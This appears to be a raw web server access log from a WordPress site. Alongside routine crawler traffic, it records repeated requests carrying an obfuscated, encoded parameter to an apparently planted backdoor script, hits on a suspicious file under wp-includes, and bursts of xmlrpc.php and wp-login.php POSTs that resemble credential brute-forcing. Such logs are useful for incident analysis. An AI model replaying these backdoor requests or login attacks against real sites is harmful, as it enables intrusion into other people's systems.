142.4.205.1 - - [17/Oct/2025:11:04:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373038302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333438302q3735353831636164343463366438613964323430616532326132656231386535222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.17 - - [17/Oct/2025:11:05:44 -0400] "GET /products/choreographer596251?id=330 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.211 - - [17/Oct/2025:11:05:50 -0400] "GET /products/crabwise198243?id=558 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [17/Oct/2025:11:05:54 -0400] "GET /products/knickers1619067?id=70 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:05:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373130302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333530302q3330323464386330393837656139343334316636653132666361373037366133222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.17 - - [17/Oct/2025:11:06:02 -0400] "GET /products/aluminosity1137424?id=42 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
82.223.122.88 - - [17/Oct/2025:11:06:15 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko,gzip(gfe)"
142.4.205.1 - - [17/Oct/2025:11:05:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373132302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333532302q6366623431613639373133663062656230623266303238323730326139353835222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
82.223.122.88 - - [17/Oct/2025:11:06:19 -0400] "POST /wp-login.php HTTP/1.0" 200 9239 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko,gzip(gfe)"
114.119.128.196 - - [17/Oct/2025:11:06:33 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks/page-list-item HTTP/1.0" 200 7056 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/blocks" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.189 - - [17/Oct/2025:11:06:33 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Felements HTTP/1.0" 200 7234 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [17/Oct/2025:11:05:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373134302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333534302q6438656162393263343130363864633236643431666632363631333264366564222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
185.191.171.19 - - [17/Oct/2025:11:06:46 -0400] "GET /products/conventionality297608?id=109 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [17/Oct/2025:11:06:47 -0400] "GET /products/acrimonious275433?id=794 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
216.73.216.189 - - [17/Oct/2025:11:06:49 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Fblocks HTTP/1.0" 200 7075 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
142.4.205.1 - - [17/Oct/2025:11:06:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373136302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333536302q3866316362633830366531653832313366626136333833663666353562613235222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.198 - - [17/Oct/2025:11:07:04 -0400] "GET /products/monopneumonous1949086?id=570 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
69.197.179.242 - - [17/Oct/2025:11:05:38 -0400] "GET /wp-includes/wpdc3def/index.php?id=511276 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=511276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
185.191.171.5 - - [17/Oct/2025:11:07:12 -0400] "GET /products/cyanometry102938?id=839 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.199 - - [17/Oct/2025:11:07:18 -0400] "GET /products/micropoikilitic1925146?id=309 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:06:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373138302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333538302q3063393331616130646163666632646538366663363333643165613633376438222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.201 - - [17/Oct/2025:11:07:20 -0400] "GET /products/putterer1397786?id=677 HTTP/1.0" 200 9239 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.196 - - [17/Oct/2025:11:07:21 -0400] "GET /products/antilocapra135455?id=430 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.19 - - [17/Oct/2025:11:07:27 -0400] "GET /products/microconidial1276385?id=445 HTTP/1.0" 200 9232 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:06:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373230302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333630302q6139353539656461323833343337623130386239643766366239663437363138222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.211 - - [17/Oct/2025:11:07:43 -0400] "GET /2025/10/03/panduan-lengkap-main-togel-digital/ HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
66.249.65.196 - - [17/Oct/2025:11:07:44 -0400] "GET /?_g=527316 HTTP/1.0" 200 24342 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.146.77 - - [17/Oct/2025:11:07:57 -0400] "GET /2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentytwentythree/templates HTTP/1.0" 200 7410 "https://academiedumarketing.com/2025/10/04/rahasia-sukses-togel-online-2025-2/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/themes/twentytwentythree" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [17/Oct/2025:11:07:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373232302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333632302q6433303562626234636332313763343336366630663335313735343639323730222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [17/Oct/2025:11:07:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373234302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333634302q3230343935633839663536653363343335306538616663396163323038393039222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
217.154.27.171 - - [17/Oct/2025:11:08:21 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
216.73.216.189 - - [17/Oct/2025:11:08:30 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Fmixins HTTP/1.0" 200 7134 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.65.197 - - [17/Oct/2025:11:08:30 -0400] "GET /?_g=2384367 HTTP/1.0" 200 24809 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
217.154.27.171 - - [17/Oct/2025:11:08:34 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
69.197.179.242 - - [17/Oct/2025:11:07:09 -0400] "GET /wp-includes/wpdc3def/index.php?id=511276 HTTP/1.0" 200 3845 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=511276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [17/Oct/2025:11:07:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373236302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333636302q6165643763326137636165323730613639373535313637346264326534353866222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.196 - - [17/Oct/2025:11:08:42 -0400] "GET /products/hemidactylous1366462?id=916 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.154.27.171 - - [17/Oct/2025:11:08:47 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
185.191.171.17 - - [17/Oct/2025:11:08:47 -0400] "GET /products/coccigenic570924?id=610 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
217.154.27.171 - - [17/Oct/2025:11:08:57 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
142.4.205.1 - - [17/Oct/2025:11:08:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373238302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333638302q6562613033653266313235333537333934363262326537393338303532303862222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
216.73.216.189 - - [17/Oct/2025:11:09:02 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Fmedia HTTP/1.0" 200 7167 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
67.225.188.52 - - [17/Oct/2025:11:09:07 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
217.154.27.171 - - [17/Oct/2025:11:09:10 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
67.225.188.52 - - [17/Oct/2025:11:09:11 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
67.225.188.52 - - [17/Oct/2025:11:09:13 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
67.225.188.52 - - [17/Oct/2025:11:09:14 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
67.225.188.52 - - [17/Oct/2025:11:09:16 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
216.73.216.189 - - [17/Oct/2025:11:09:17 -0400] "GET /category/uncategorized?path=%2Fvar%2Fwww%2Fvhosts%2Facademiedumarketing.com%2Fpublic_html%2Fwp-content%2Fthemes%2Ftwentynineteen%2Fsass%2Fsite HTTP/1.0" 200 7257 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
67.225.188.52 - - [17/Oct/2025:11:09:18 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
142.4.205.1 - - [17/Oct/2025:11:08:20 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373330302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333730302q6432343334643963653266336461326232393761393839613138373332326334222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
217.154.27.171 - - [17/Oct/2025:11:09:20 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
114.119.145.188 - - [17/Oct/2025:11:09:21 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/src/Content HTTP/1.0" 200 7039 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/SimplePie/src" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
85.208.96.200 - - [17/Oct/2025:11:09:28 -0400] "GET /products/farweltered127557?id=570 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:08:40 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373332302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333732302q3837306636656338643036623066646466636536303066333861373563313831222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.196 - - [17/Oct/2025:11:09:39 -0400] "GET /products/outsavor1014376?id=188 HTTP/1.0" 200 9239 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.210 - - [17/Oct/2025:11:09:48 -0400] "GET /products/misdeformed1730585?id=348 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.252.234.215 - - [17/Oct/2025:11:09:52 -0400] "GET /wp-login.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
185.252.234.215 - - [17/Oct/2025:11:09:53 -0400] "POST /wp-login.php HTTP/1.0" 200 9227 "https://academiedumarketing.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15"
66.249.65.196 - - [17/Oct/2025:11:09:53 -0400] "GET /?_g=1284539 HTTP/1.0" 200 23891 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.19 - - [17/Oct/2025:11:09:54 -0400] "GET /products/erogenous507280?id=15 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.201 - - [17/Oct/2025:11:09:56 -0400] "GET /products/fanged765357?id=442 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.209 - - [17/Oct/2025:11:09:58 -0400] "GET /products/hypostasis1169629?id=738 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
142.4.205.1 - - [17/Oct/2025:11:09:00 -0400] "GET /njABawTk/njABawTk/njABawTk/index.php?ARRAY=7o2230223n313736303731373334302p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303731333734302q3238643133396334343137623139383035333132353135373631366666363330222p2232223n226532636665346139653937636530383933626234633932343232333362363764222p2233223n223731336661633265343537656430663232613737336362393365396137343664222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36362q37312q38392q3231227q HTTP/1.0" 504 4358 "-" "-"
85.208.96.193 - - [17/Oct/2025:11:10:06 -0400] "GET /products/brotherwort816966?id=273 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.202 - - [17/Oct/2025:11:10:08 -0400] "GET /products/premythical585680?id=317 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
85.208.96.195 - - [17/Oct/2025:11:10:15 -0400] "GET /products/bucketmaker1007225?id=358 HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
69.197.179.242 - - [17/Oct/2025:11:08:52 -0400] "GET /wp-includes/wpdc3def/index.php?id=511276 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=511276" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
